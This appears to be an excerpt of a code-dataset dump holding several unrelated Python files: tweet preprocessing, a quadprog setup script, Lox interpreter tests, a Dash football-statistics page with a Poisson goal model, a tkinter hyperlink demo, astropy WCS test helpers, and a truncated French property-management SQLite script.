\"'ve\":\n token = \"have\"\n elif token == \"covid-\" or token == \"corona\" or token == \"coronavirus\":\n token = \"covid\"\n elif token == \"'re\":\n token == \"are\"\n elif token == \"'t\":\n token == \"not\"\n\n lemmatizer = WordNetLemmatizer()\n token = lemmatizer.lemmatize(token, pos)\n\n if len(token) > 1 and token not in string.punctuation and token.lower() not in stop_words:\n cleaned_tokens.append(token.lower())\n #print(cleaned_tokens)\n return cleaned_tokens\n\n\ndef get_all_words(positive):\n for tokens in positive:\n for token in tokens:\n yield token\n\n\ndef get_tweets_for_model(token_list):\n for tweet_tokens in token_list:\n yield dict([token, True] for token in tweet_tokens)\n\n\n# OLD: built for using a jsonl file converted to csv\ndef extract_needed_data():\n all_hydrated_data = files_location + \"/hydrated_data.csv\"\n output_file = files_location + \"/US_data_UNLABELED.csv\"\n if not os.path.exists(all_hydrated_data):\n print(\"not cool\")\n if os.path.exists(output_file):\n os.remove(output_file)\n\n with open(output_file, 'w+', newline='', encoding=\"utf8\") as writefile:\n with open(all_hydrated_data, encoding=\"utf8\") as readfile:\n r = csv.reader(readfile, delimiter=',')\n w = csv.writer(writefile)\n for row in r:\n row_data = []\n colCount = 0\n for cell in range(len(row)):\n cell_data = row[cell]\n if cell_data[:14] == '{\"created_at\":':\n date_string = cell_data[15:(len(cell_data) - 1)]\n # reformat timestamp\n date_obj = datetime.strptime(date_string, \"%a %b %d %H:%M:%S %z %Y\")\n if cell_data[:3] == \"id:\" and len(row_data) == 1:\n tweet_id = cell_data[3:(len(cell_data) - 1)]\n if colCount == 3:\n full_text = cell_data[11:]\n if (colCount == 4 or colCount == 5 or colCount == 6) and (\n cell_data != \"truncated:false\" and cell_data[:19] != \"display_text_range:\"):\n full_text = full_text + \" \" + cell_data\n # if cell_data[:10] == \"full_text:\":\n # full_text = cell_data[11:]\n if cell_data[:13] == \"country_code:\":\n country_code = cell_data[14:(len(cell_data) - 1)]\n colCount = colCount + 1\n\n if country_code == \"US\":\n row_data.append(date_obj)\n row_data.append(country_code)\n row_data.append(full_text)\n if len(row_data) == 3:\n w.writerow(row_data)\n print(\"Done extracting.\")\n","repo_name":"sydneyberry/IndependentStudy","sub_path":"data_prep.py","file_name":"data_prep.py","file_ext":"py","file_size_in_byte":8976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11522295283","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 3 21:15:19 2015\n@author: rwalker (r_walker@zoho.com)\n\"\"\"\nfrom __future__ import division, absolute_import, print_function\nfrom numpy.distutils.core import setup, Extension\nfrom numpy.distutils.misc_util import Configuration\nfrom numpy.distutils.system_info import get_info\n\n# fortran/f2py source files\nfsource = ['src/pyquadprog.pyf', \n 'src/achck.f', \n 'src/aind.f', \n 'src/solve.QP.compact.f', \n 'src/solve.QP.f', \n 'src/util.f']\n\nquadprog_ext = Extension( name = 'pyquadprog', sources=fsource, libraries=[\"blas\",\"lapack\"])\n\nif __name__ == \"__main__\":\n setup(name='quadprog',\n version='0.1',\n description='Python binding for Berwin Turlach\\'s quadprog routine.',\n url='http://github.com/rwalk333/pyquadprog',\n author='rwalker',\n author_email='r_walker@zoho.com',\n py_modules = ['quadprog'],\n license='GPL V2',\n ext_modules=[quadprog_ext])\n","repo_name":"rwalk/pyquadprog","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"3882743795","text":"import subprocess\nfrom subprocess import PIPE\n\nimport unittest\n\ndef process_stdout(data: bytearray):\n s = data.decode('utf-8')\n s = s.strip().replace(\"\\r\\n\", \"\\n\")\n return s\n\ndef process_expected(s: str):\n return \"\\n\".join(\n line.strip() for line in s.splitlines()\n ).strip()\n\ndef process_stderr(data: bytearray):\n return data.decode(\"utf-8\")\n\ndef exec_program(program, timeout=1):\n proc = subprocess.Popen(\n [\"python\", \"lox.py\", \"--\"], \n stdin=PIPE, stdout=PIPE, stderr=PIPE)\n stdout, stderr = proc.communicate(program.encode(\"utf-8\"), timeout=timeout)\n return process_stdout(stdout), process_stderr(stderr)\n\nclass Tests(unittest.TestCase):\n def test_print_literals(self):\n program = \"\"\"\n print 1;\n print -1;\n print 1.25;\n print -1.25;\n print true;\n print false;\n print nil;\n print \"hello\";\n \"\"\"\n\n expected = process_expected(\"\"\"\n 1\n -1\n 1.25\n -1.25\n true\n false\n nil\n hello\n \"\"\")\n\n stdout, stderr = exec_program(program)\n self.assertEqual(expected, stdout)\n self.assertEqual(\"\", stderr)\n\n def test_assignment(self):\n program = \"\"\"\n var a = 1;\n var b = 2;\n var c;\n c = a + b;\n print c;\n \"\"\"\n expected = process_expected(\"3\")\n \n stdout, stderr = exec_program(program)\n self.assertEqual(expected, stdout)\n self.assertEqual(\"\", stderr)\n\n def test_assignment_expr(self):\n program = \"\"\"\n var a; var b; var c;\n a = b = c = 2;\n print a == b and b == c;\n \"\"\"\n expected = process_expected(\"true\")\n \n stdout, stderr = exec_program(program)\n self.assertEqual(expected, stdout)\n self.assertEqual(\"\", stderr)\n\n def test_if(self):\n ...\n\n def test_while(self):\n program_1 = \"\"\"\n while (false) print 1;\n \"\"\"\n expected_1 = \"\"\n\n stdout_1, stderr_1 = exec_program(program_1)\n self.assertEqual(expected_1, stdout_1)\n self.assertEqual(\"\", stderr_1)\n\n program_2 = \"\"\"\n var a = 1;\n while (a) { print a; a = 0; }\n \"\"\"\n expected_2 = \"1\"\n stdout_2, stderr_2 = exec_program(program_2)\n self.assertEqual(expected_2, stdout_2)\n self.assertEqual(\"\", stderr_2)\n\n # Fibonacci numbers below 20\n program_3 = \"\"\"\n var temp;\n var a = 1;\n var b = 1;\n while (a < 20) { \n print a;\n temp = a;\n a = b;\n b = temp + b;\n }\n \"\"\"\n expected_3 = process_expected(\"\\n\".join(map(str, [1,1,2,3,5,8,13])))\n stdout_3, stderr_3 = exec_program(program_3)\n self.assertEqual(expected_3, stdout_3)\n self.assertEqual(\"\", stderr_3)\n\n def test_while_nested(self):\n program = \"\"\"\n var a = 1;\n while (a < 5) {\n var b = a;\n while (b < 5) {\n var c = b;\n while (c < 10) {\n c = c + 1;\n }\n b = c;\n }\n a = b;\n while (a < 5) {\n a = 1000;\n }\n }\n print a;\n \"\"\"\n expected = \"10\"\n\n stdout, stderr = exec_program(program)\n self.assertEqual(expected, stdout)\n self.assertEqual(\"\", stderr)\n\n def test_break(self):\n ...\n \n def test_break_nested(self):\n ...\n\n def test_break_errors(self):\n prog_1 = \"break;\"\n stdout_1, stderr_1 = exec_program(prog_1)\n self.assertEqual(\"\", stdout_1)\n self.assertEqual(\n stderr_1.strip(), \n \"[line 1] Error at 'break': Expect 'break' to appear inside a loop.\"\n )\n\n prog_2 = \"\"\"\n while (false) break;\n break; \n \"\"\"\n stdout_2, stderr_2 = exec_program(prog_2)\n self.assertEqual(\"\", stdout_2)\n self.assertEqual(\n stderr_2.strip(), \n \"[line 1] Error at 'break': Expect 'break' to appear inside a loop.\"\n )\n\n prog_3 = \"\"\"\n break; \n while (false) break;\n \"\"\"\n stdout_3, stderr_3 = exec_program(prog_3)\n self.assertEqual(\"\", stdout_3)\n self.assertEqual(\n stderr_3.strip(), \n \"[line 1] Error at 'break': Expect 'break' to appear inside a loop.\"\n )\n \n \n\n\n\n \n\n\n\n# TODO: Test the following\n# * expressions: all mathematical operators, string concat, logical operators (==, <, >, !), unary ops\n# * and, or\n# * Bracketing\n# * Expression precedence\n# * Statements: If, For, While\n# * Blocks: shadowing, nesting, \n# * Error handling: scanning, parsing and runtime errors\n# * Var declaration after if/while/for without block\n\n \n\n\n \n","repo_name":"jonaengs/plox","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31091305445","text":"import dash\nimport dash_bootstrap_components as dbc\nimport pandas as pd\nimport plotly.express as px\nfrom dash import html, dcc, Output, Input, callback\nfrom sklearn.linear_model import PoissonRegressor\nfrom sklearn.compose import TransformedTargetRegressor\nfrom sklearn.preprocessing import FunctionTransformer\n\n\ndash.register_page(__name__)\n\nresumenPartido = pd.read_csv(r'C:\\Users\\daniel.rojas\\Documents\\FutbolAnalytics\\FutbolAnalytics\\data\\resumenPartido.csv')\nresumenPartido['disparoPuerta'] = resumenPartido.apply(lambda x: x['gol'] if x['gol'] > 0 and x['disparoPuerta'] == 0 else x['disparoPuerta'], axis=1)\ninfoPartido = pd.read_csv(r'C:\\Users\\daniel.rojas\\Documents\\FutbolAnalytics\\FutbolAnalytics\\data\\factPartido.csv')\nestadisticaPartido = pd.read_csv(r'C:\\Users\\daniel.rojas\\Documents\\FutbolAnalytics\\FutbolAnalytics\\data\\factEstadisticaPartido.csv')\nequipo = pd.read_csv(r'C:\\Users\\daniel.rojas\\Documents\\FutbolAnalytics\\FutbolAnalytics\\data\\dimEquipo.csv')\n\n#consolidado informacion para prediccion\nmodel_data = pd.DataFrame(columns=['team', 'opponent', 'goals', 'home'])\ntmp = estadisticaPartido[['fkEquipoLocal','fkEquipoVisitante','golLocal']].copy()\ntmp.rename(columns={'fkEquipoLocal':'team'\n ,'fkEquipoVisitante':'opponent'\n ,'golLocal':'goals'\n },inplace=True )\ntmp['home'] = 1\ntmp = tmp.reset_index()\nmodel_data = pd.concat([model_data, tmp], axis=0)\n\ntmp = estadisticaPartido[['fkEquipoVisitante', 'fkEquipoLocal','golVisitante']].copy()\ntmp.rename(columns={'fkEquipoVisitante':'team'\n ,'fkEquipoLocal':'opponent'\n ,'golVisitante':'goals'\n },inplace=True )\ntmp['home'] = 0\ntmp = tmp.reset_index()\nmodel_data = pd.concat([model_data, tmp], axis=0)\n\nmodel_data = model_data.reset_index()\nmodel_data = model_data[['team','opponent', 'home', 'goals']]\nmodel_data['goals'] = model_data['goals'].astype(int)\n\n# Crea un modelo de regresión Poisson utilizando scikit-learn\npois_model = PoissonRegressor()\nx = model_data[['home', 'team', 'opponent']]\ny = model_data['goals']\npois_model.fit(x, y)\n\nlayout = html.Div([\n html.H5(\"Enfretamiento entre equipos\", className=\"display-4\", style={'textAlign':'center'}),\n html.Hr(),\n html.Div([\n dbc.Row([\n dbc.Col([\n html.Div([\n html.Div(html.H6('Elegir Equipo Local')),\n html.Div(dcc.Dropdown(resumenPartido['equipo'].unique() ,'Liverpool', id='equipo_local'))\n ])\n ]),\n dbc.Col([\n html.Div([\n html.Div(html.H6('Elegir Equipo Visitante')),\n html.Div(dcc.Dropdown(resumenPartido['equipo'].unique() ,'Brighton', id='equipo_visitante'))\n ])\n ])\n ])\n ]),\n html.Br(),\n html.Div([\n dbc.Row([\n dbc.Col([\n html.Div(dcc.Graph(figure={}, id='graf_cantidad_enfretamientos'))\n ]),\n dbc.Col([\n dbc.Row([\n dbc.Col([\n html.Div([\n html.Div(html.P('Cantidad de Enfretamientos')),\n html.Div(html.P(id='cantidad_enfretamientos'))\n ])\n ]) \n ]),\n dbc.Row([\n dbc.Col([\n html.Div([\n html.Div(html.P('Goles Marcados Local')),\n html.Div(html.P(id='gol_marcado_local'))\n ])\n ]),\n dbc.Col([\n html.Div([\n html.Div(html.P('Goles Marcados Visitante')),\n html.Div(html.P(id='gol_marcado_visitante'))\n ])\n ])\n ]),\n dbc.Row([\n dbc.Col([\n html.Div([\n html.Div(html.P('Disparos a Puerta Local')),\n html.Div(html.P(id='disparo_puerta_local'))\n ])\n ]),\n dbc.Col([\n html.Div([\n html.Div(html.P('Disparos a Puerta Visitante')),\n html.Div(html.P(id='disparo_puerta_visitante'))\n ])\n ])\n ]),\n dbc.Row([\n dbc.Col([\n html.Div([\n html.Div(html.P('Tiros de Esquina Local')),\n html.Div(html.P(id='tiro_esquina_local'))\n ])\n ]),\n dbc.Col([\n html.Div([\n html.Div(html.P('Tiros de Esquina Visitante')),\n html.Div(html.P(id='tiro_esquina_visitante'))\n ])\n ])\n ]),\n dbc.Row([\n dbc.Col([\n html.Div([\n html.Div(html.P('Faltas Realizadas Local')),\n html.Div(html.P(id='faltas_local'))\n ])\n ]),\n dbc.Col([\n html.Div([\n html.Div(html.P('Faltas Realizadas Visitante')),\n html.Div(html.P(id='faltas_visitante'))\n ])\n ])\n ])\n ])\n ]),\n html.Hr(),\n dbc.Row([\n dbc.Col([\n html.Div([\n html.Div(html.P('Comparación indicadores', style={'textAlign':'center'})),\n html.Div(dcc.Graph(figure={}, id='radar-polar'))\n ])\n ])\n ]),\n dbc.Row([\n dbc.Col([\n html.Div([\n html.Div(html.P('Predicción Gol Local', style={'textAlign':'center'})),\n html.Div(html.P(id='prediccion_gol_local', style={'textAlign':'center'})),\n html.Div(dcc.Graph(figure={}, id='gol_historico_local'))\n ])\n ]),\n dbc.Col([\n html.Div([\n html.Div(html.P('Predicción Gol Visitante', style={'textAlign':'center'})),\n html.Div(html.P(id='prediccion_gol_visitante', style={'textAlign':'center'})),\n html.Div(dcc.Graph(figure={}, id='gol_historico_visitante'))\n ])\n ])\n ])\n ])\n])\n\n@callback(\n Output(component_id='gol_historico_visitante',component_property='figure'),\n Input(component_id='equipo_visitante',component_property='value')\n)\ndef actualizarGolHistoricoVisitante(equipoVisitante):\n df = resumenPartido[['equipo','gol', 'fecha']].copy()\n df['fecha'] = pd.to_datetime(df['fecha'])\n df = df[(df.equipo==equipoVisitante) &(df.fecha > '2023-01-01')]\n figure = px.scatter(df, x='fecha', y='gol'\n , trendline=\"rolling\"\n , trendline_options=dict(window=5)\n ,title='Goles Marcados Visitante'\n ,color_discrete_sequence=['#F2055C']\n ,template='simple_white'\n )\n return figure\n\n\n@callback(\n Output(component_id='gol_historico_local',component_property='figure'),\n Input(component_id='equipo_local',component_property='value')\n)\ndef actualizarGolHistoricoLocal(equipoLocal):\n df = resumenPartido[['equipo','gol', 'fecha']].copy()\n df['fecha'] = pd.to_datetime(df['fecha'])\n df = df[(df.equipo==equipoLocal) & (df.fecha > '2023-01-01')]\n figure = px.scatter(df, x='fecha', y='gol'\n , trendline=\"rolling\"\n , trendline_options=dict(window=5)\n ,title='Goles Marcados Local'\n ,color_discrete_sequence=['#340040']\n ,template='simple_white'\n )\n return figure\n\n@callback(\n Output(component_id='prediccion_gol_visitante',component_property='children'),\n [Input(component_id='equipo_local',component_property='value'),\n Input(component_id='equipo_visitante',component_property='value')]\n)\ndef actualizarPrediccionGolLocal(equipoLocal, equipoVisitante):\n skEquipoLocal = equipo[equipo.equipoDesc==equipoLocal].values[0][0]\n skEquipoVisitante = equipo[equipo.equipoDesc==equipoVisitante].values[0][0]\n prediccionVisitante = pois_model.predict(pd.DataFrame({'home': [0], 'team': [skEquipoVisitante], 'opponent': [skEquipoLocal]}))\n prediccionVisitante = round(prediccionVisitante[0],3)\n return prediccionVisitante\n\n@callback(\n Output(component_id='prediccion_gol_local',component_property='children'),\n [Input(component_id='equipo_local',component_property='value'),\n Input(component_id='equipo_visitante',component_property='value')]\n)\ndef actualizarPrediccionGolLocal(equipoLocal, equipoVisitante):\n skEquipoLocal = equipo[equipo.equipoDesc==equipoLocal].values[0][0]\n skEquipoVisitante = equipo[equipo.equipoDesc==equipoVisitante].values[0][0]\n prediccionLocal = pois_model.predict(pd.DataFrame({'home': [1], 'team': [skEquipoLocal], 'opponent': [skEquipoVisitante]}))\n prediccionLocal = round(prediccionLocal[0],3)\n return prediccionLocal\n\n@callback(\n Output(component_id='faltas_visitante',component_property='children'),\n [Input(component_id='equipo_local',component_property='value'),\n Input(component_id='equipo_visitante',component_property='value')]\n)\ndef actualizarFaltaVisitante(equipoLocal, equipoVisitante):\n df = estadisticaPartido[(estadisticaPartido.equipoLocal==equipoLocal) & (estadisticaPartido.equipoVisitante==equipoVisitante)]\n txt = str(df['faltaVistante'].sum())\n return txt\n\n@callback(\n Output(component_id='faltas_local',component_property='children'),\n [Input(component_id='equipo_local',component_property='value'),\n Input(component_id='equipo_visitante',component_property='value')]\n)\ndef actualizarFaltaLocal(equipoLocal, equipoVisitante):\n df = estadisticaPartido[(estadisticaPartido.equipoLocal==equipoLocal) & (estadisticaPartido.equipoVisitante==equipoVisitante)]\n txt = str(df['faltaLocal'].sum())\n return txt\n\n@callback(\n Output(component_id='tiro_esquina_visitante',component_property='children'),\n [Input(component_id='equipo_local',component_property='value'),\n Input(component_id='equipo_visitante',component_property='value')]\n)\ndef actualizarTiroEsquinaVisitante(equipoLocal, equipoVisitante):\n df = estadisticaPartido[(estadisticaPartido.equipoLocal==equipoLocal) & (estadisticaPartido.equipoVisitante==equipoVisitante)]\n txt = str(df['TiroEsquinaVisitante'].sum())\n return txt\n\n@callback(\n Output(component_id='tiro_esquina_local',component_property='children'),\n [Input(component_id='equipo_local',component_property='value'),\n Input(component_id='equipo_visitante',component_property='value')]\n)\ndef actualizarTiroEsquinaLocal(equipoLocal, equipoVisitante):\n df = estadisticaPartido[(estadisticaPartido.equipoLocal==equipoLocal) & (estadisticaPartido.equipoVisitante==equipoVisitante)]\n txt = str(df['TiroEsquinaLocal'].sum())\n return txt\n\n@callback(\n Output(component_id='disparo_puerta_visitante',component_property='children'),\n [Input(component_id='equipo_local',component_property='value'),\n Input(component_id='equipo_visitante',component_property='value')]\n)\ndef actualizarDisparoPuertaVisitante(equipoLocal, equipoVisitante):\n df = estadisticaPartido[(estadisticaPartido.equipoLocal==equipoLocal) & (estadisticaPartido.equipoVisitante==equipoVisitante)]\n txt = str(df['disparoPuertaVisitante'].sum())\n return txt\n\n@callback(\n Output(component_id='disparo_puerta_local',component_property='children'),\n [Input(component_id='equipo_local',component_property='value'),\n Input(component_id='equipo_visitante',component_property='value')]\n)\ndef actualizarDisparoPuertaLocal(equipoLocal, equipoVisitante):\n df = estadisticaPartido[(estadisticaPartido.equipoLocal==equipoLocal) & (estadisticaPartido.equipoVisitante==equipoVisitante)]\n txt = str(df['disparoPuertaLocal'].sum())\n return txt\n\n@callback(\n Output(component_id='gol_marcado_visitante',component_property='children'),\n [Input(component_id='equipo_local',component_property='value'),\n Input(component_id='equipo_visitante',component_property='value')]\n)\ndef actualizarGolMarcadoVisitante(equipoLocal, equipoVisitante):\n df = estadisticaPartido[(estadisticaPartido.equipoLocal==equipoLocal) & (estadisticaPartido.equipoVisitante==equipoVisitante)]\n txt = str(df['golVisitante'].sum())\n return txt\n\n@callback(\n Output(component_id='gol_marcado_local',component_property='children'),\n [Input(component_id='equipo_local',component_property='value'),\n Input(component_id='equipo_visitante',component_property='value')]\n)\ndef actualizarGolMarcadoLocal(equipoLocal, equipoVisitante):\n df = estadisticaPartido[(estadisticaPartido.equipoLocal==equipoLocal) & (estadisticaPartido.equipoVisitante==equipoVisitante)]\n txt = str(df['golLocal'].sum())\n return txt\n\n\n@callback(\n Output(component_id='graf_cantidad_enfretamientos',component_property='figure'),\n [Input(component_id='equipo_local',component_property='value'),\n Input(component_id='equipo_visitante',component_property='value')]\n)\ndef graficaCantidadEnfretamientos(equipoLocal, equipoVisitante):\n df = infoPartido[(infoPartido.equipoLocal==equipoLocal) & (infoPartido.equipoVisitante==equipoVisitante)]\n df = df.groupby('resultado', as_index=False)['skPartido'].count()\n figure=px.pie(df, values='skPartido', names='resultado'\n ,width=370\n ,height=350\n ,hole=0.5\n ,color_discrete_sequence= ['#340040','#F2055C','#05F26C']\n )\n figure.update_layout(legend_title_text='Victoria')\n return figure\n\n\n@callback(\n Output(component_id='cantidad_enfretamientos',component_property='children'),\n [Input(component_id='equipo_local',component_property='value'),\n Input(component_id='equipo_visitante',component_property='value')]\n)\ndef actualizarCantidadEnfretamientos(equipoLocal, equipoVisitante):\n txt = str(len(infoPartido[(infoPartido.equipoLocal==equipoLocal) & (infoPartido.equipoVisitante==equipoVisitante)]))\n return txt\n\n@callback(\n Output(component_id='radar-polar',component_property='figure'),\n [Input(component_id='equipo_local',component_property='value'),\n Input(component_id='equipo_visitante',component_property='value')]\n)\ndef actualizarRadar(equipoLocal, equipoVisitante):\n resumenPartido['atajada'] = resumenPartido['atajada'].replace(-1,0)\n resumenPartido['Efectividad Arquero'] = resumenPartido.apply(lambda x: 1 if x['atajada'] == 0 and x['disparoPuertaEnContra'] == 0 else (x['atajada'] / x['disparoPuertaEnContra']), axis=1 )\n #resumenPartido['Efectividad Arquero'] = resumenPartido['atajada'] / resumenPartido['disparoPuertaEnContra']\n resumenPartido['Efectividad Derribo'] = resumenPartido['derriboConseguido'] / resumenPartido['derribo']\n resumenPartido['Efectividad Disparo'] = resumenPartido['gol'] / resumenPartido['disparoPuerta']\n \n polar = resumenPartido[['equipo', 'Efectividad Arquero', 'Efectividad Derribo', 'Efectividad Disparo'\n , 'posesionBalon', 'precisionPase']].copy()\n polar.fillna(0, inplace=True)\n polar = polar.groupby('equipo', as_index=False)[['Efectividad Arquero','Efectividad Derribo','Efectividad Disparo'\n , 'posesionBalon', 'precisionPase']].mean()\n polar.rename(columns={'posesionBalon': 'Posesion Balon',\n 'precisionPase': 'Precision Pase'}, inplace=True)\n polar.fillna(0, inplace=True)\n polar = polar.melt(\n id_vars=['equipo'],\n var_name='metrica',\n value_name='valor')\n polar['valor'] = round(polar['valor'] * 100,1)\n\n df = polar[(polar.equipo== equipoLocal) | (polar.equipo== equipoVisitante) ]\n figure = px.line_polar(df, r='valor', theta='metrica'\n , line_close = True\n , color='equipo'\n , color_discrete_sequence=['#F2055C','#05F26C'])\n figure.update_traces(fill = 'toself')\n return figure","repo_name":"DaniRojas2022/Analiticapp_datos_deportivos","sub_path":"app/pages/versus.py","file_name":"versus.py","file_ext":"py","file_size_in_byte":16815,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43276273856","text":"import tkinter as tk\n\n\nclass HyperlinkManager:\n def __init__(self, text):\n self.text = text\n self.text.tag_config(\"hyper\", foreground=\"blue\", underline=1)\n self.text.tag_bind(\"hyper\", \"\", self._enter)\n self.text.tag_bind(\"hyper\", \"\", self._leave)\n self.text.tag_bind(\"hyper\", \"\", self._click)\n self.reset()\n\n def reset(self):\n self.links = {}\n\n def add(self, action):\n # add an action to the manager. returns tags to use in\n # associated text widget\n tag = \"hyper-%d\" % len(self.links)\n self.links[tag] = action\n return \"hyper\", tag\n\n def _enter(self, event):\n self.text.config(cursor=\"hand2\")\n\n def _leave(self, event):\n self.text.config(cursor=\"\")\n\n def _click(self, event):\n for tag in self.text.tag_names(tk.CURRENT):\n if tag[:6] == \"hyper-\":\n self.links[tag]()\n return\n\n\nb_songs_list = ['Bollywood song 1', 'Bollywood song 2', 'Bollywood song 3']\ni_songs_list = ['International song 1', 'International song 2',\n 'International song 3']\n\nroot = tk.Tk()\nS = tk.Scrollbar(root)\nT = tk.Text(root, height=20, width=30, cursor=\"hand2\")\nhyperlink = HyperlinkManager(T)\nS.pack(side=tk.RIGHT, fill=tk.Y)\nT.pack(side=tk.LEFT, fill=tk.Y)\nS.config(command=T.yview)\nT.config(yscrollcommand=S.set)\n\n\ndef click1():\n print('click1')\n\n\ndef callback_a(): # Bollywood songs WITH hyperlinks\n T.delete(1.0, tk.END)\n for songs in b_songs_list:\n T.insert(tk.END, songs, hyperlink.add(click1))\n T.insert(tk.END, '\\n')\n\n\ndef callback_b():\n T.delete(1.0, tk.END)\n for songs in i_songs_list:\n T.insert(tk.END, songs + '\\n')\n\n\nbollywood_button = tk.Button(root, text=\"Bollywood-Top-50\", command=callback_a)\nbollywood_button.pack()\n\ninternational_button = tk.Button(root, text=\"International-Top-50\",\n command=callback_b)\ninternational_button.pack() \nroot.mainloop()\n","repo_name":"YohanChevalier/PYCORETEXT","sub_path":"tests/test_hyperlink_stackoverflow_50327234.py","file_name":"test_hyperlink_stackoverflow_50327234.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18588909061","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\"\"\"Testing utilities. Not part of the public API!\"\"\"\n\nfrom astropy.wcs import WCS\nfrom astropy.wcs.wcsapi import BaseHighLevelWCS\n\n\ndef assert_wcs_seem_equal(wcs1, wcs2):\n \"\"\"Just checks a few attributes to make sure wcs instances seem to be\n equal.\n \"\"\"\n if wcs1 is None and wcs2 is None:\n return\n assert wcs1 is not None\n assert wcs2 is not None\n if isinstance(wcs1, BaseHighLevelWCS):\n wcs1 = wcs1.low_level_wcs\n if isinstance(wcs2, BaseHighLevelWCS):\n wcs2 = wcs2.low_level_wcs\n assert isinstance(wcs1, WCS)\n assert isinstance(wcs2, WCS)\n if wcs1 is wcs2:\n return\n assert wcs1.wcs.compare(wcs2.wcs)\n\n\ndef _create_wcs_simple(naxis, ctype, crpix, crval, cdelt):\n wcs = WCS(naxis=naxis)\n wcs.wcs.crpix = crpix\n wcs.wcs.crval = crval\n wcs.wcs.cdelt = cdelt\n wcs.wcs.ctype = ctype\n return wcs\n\n\ndef create_two_equal_wcs(naxis):\n return [\n _create_wcs_simple(\n naxis=naxis,\n ctype=[\"deg\"] * naxis,\n crpix=[10] * naxis,\n crval=[10] * naxis,\n cdelt=[1] * naxis,\n ),\n _create_wcs_simple(\n naxis=naxis,\n ctype=[\"deg\"] * naxis,\n crpix=[10] * naxis,\n crval=[10] * naxis,\n cdelt=[1] * naxis,\n ),\n ]\n\n\ndef create_two_unequal_wcs(naxis):\n return [\n _create_wcs_simple(\n naxis=naxis,\n ctype=[\"deg\"] * naxis,\n crpix=[10] * naxis,\n crval=[10] * naxis,\n cdelt=[1] * naxis,\n ),\n _create_wcs_simple(\n naxis=naxis,\n ctype=[\"m\"] * naxis,\n crpix=[20] * naxis,\n crval=[20] * naxis,\n cdelt=[2] * naxis,\n ),\n ]\n","repo_name":"astropy/astropy","sub_path":"astropy/nddata/_testing.py","file_name":"_testing.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":4015,"dataset":"github-code","pt":"21"} +{"seq_id":"26275167282","text":"import tkinter as tk\nfrom tkinter import ttk\nimport sqlite3\n\n# Connectez-vous à la base de données SQLite (créez-la si elle n'existe pas)\nconn = sqlite3.connect('gestion_immobiliere.db')\ncursor = conn.cursor()\n\n# Créez une table 'propriete' si elle n'existe pas\ncursor.execute('''CREATE TABLE IF NOT EXISTS propriete\n (id INTEGER PRIMARY KEY, adresse TEXT, type_propriete TEXT, statut TEXT, prix REAL)''')\n\ncursor.execute('''CREATE TABLE IF NOT EXISTS tache\n (id INTEGER PRIMARY KEY, description TEXT, date_limite TEXT, priorite INTEGER)''')\n\n# Créez une table 'locataire' si elle n'existe pas\ncursor.execute('''CREATE TABLE IF NOT EXISTS locataire\n (id INTEGER PRIMARY KEY, nom TEXT, prenom TEXT, email TEXT, telephone TEXT, date_naissance TEXT)''')\n\n# Créez une table 'paiement' si elle n'existe pas\ncursor.execute('''CREATE TABLE IF NOT EXISTS paiement\n (id INTEGER PRIMARY KEY, locataire_id INTEGER, montant REAL, date_paiement TEXT, methode_paiement TEXT, reference TEXT)''')\n\n# Créez une table 'employe' si elle n'existe pas\ncursor.execute('''CREATE TABLE IF NOT EXISTS employe\n (id INTEGER PRIMARY KEY, nom TEXT, prenom TEXT, email TEXT, telephone TEXT, poste TEXT, salaire REAL)''')\n\n# Créez une table 'document' si elle n'existe pas\ncursor.execute('''CREATE TABLE IF NOT EXISTS document\n (id INTEGER PRIMARY KEY, titre TEXT, date_creation TEXT, type_document TEXT, contenu TEXT)''')\n\n# Créez une table 'contact' si elle n'existe pas\ncursor.execute('''CREATE TABLE IF NOT EXISTS contact\n (id INTEGER PRIMARY KEY, nom TEXT, prenom TEXT, email TEXT, telephone TEXT, relation TEXT)''')\n\n# Créez une table 'analyse_rentabilite' si elle n'existe pas\ncursor.execute('''CREATE TABLE IF NOT EXISTS analyse_rentabilite\n (id INTEGER PRIMARY KEY, propriete_id INTEGER, total_revenus REAL, total_depenses REAL, profit REAL, taux_rentabilite REAL)''')\n\n# Créez une table 'comptabilite' si elle n'existe pas\ncursor.execute('''CREATE TABLE IF NOT EXISTS comptabilite\n (id INTEGER PRIMARY KEY, categorie TEXT, montant REAL, date_operation TEXT, description TEXT)''')\n\n# Validez les modifications et fermez la connexion\nconn.commit()\nconn.close()\n\n\n\n\n# Module: Gestion des propriétés\n# Module: Gestion des propriétés\nclass Propriete:\n def __init__(self, id, adresse, type_propriete, statut, prix):\n self.id = id\n self.adresse = adresse\n self.type_propriete = type_propriete\n self.statut = statut\n self.prix = prix\n\n def ajouter_propriete(self):\n pass # Code pour ajouter une propriété à la base de données\n\n def supprimer_propriete(self):\n pass # Code pour supprimer une propriété de la base de données\n\n def modifier_propriete(self):\n pass # Code pour modifier les détails d'une propriété dans la base de données\n\n def rechercher_propriete(self, filtre):\n pass # Code pour rechercher des propriétés dans la base de données en fonction des critères de filtre\n\n# Module: Gestion des taches\nclass GestionnaireTaches:\n def __init__(self):\n self.taches = []\n\n def ajouter_tache(self, tache):\n self.taches.append(tache)\n\n def supprimer_tache(self):\n index = int(input(\"Entrez l'index de la tâche à supprimer : \"))\n del self.taches[index]\n\n def afficher_taches(self):\n print(\"Liste des tâches :\")\n for i, tache in enumerate(self.taches):\n print(f\"{i}. {tache}\")\n\n\n# Module: Gestion des Payments \nclass GestionPaiements:\n def __init__(self):\n self.paiements = []\n\n def ajouter_paiement(self, paiement):\n self.paiements.append(paiement)\n\n def supprimer_paiement(self):\n # Le corps de la fonction doit être indenté\n index = int(input(\"Entrez l'index du paiement à supprimer : \"))\n del self.paiements[index]\n\n def afficher_paiements(self):\n # Le corps de la fonction doit également être indenté\n for paiement in self.paiements:\n 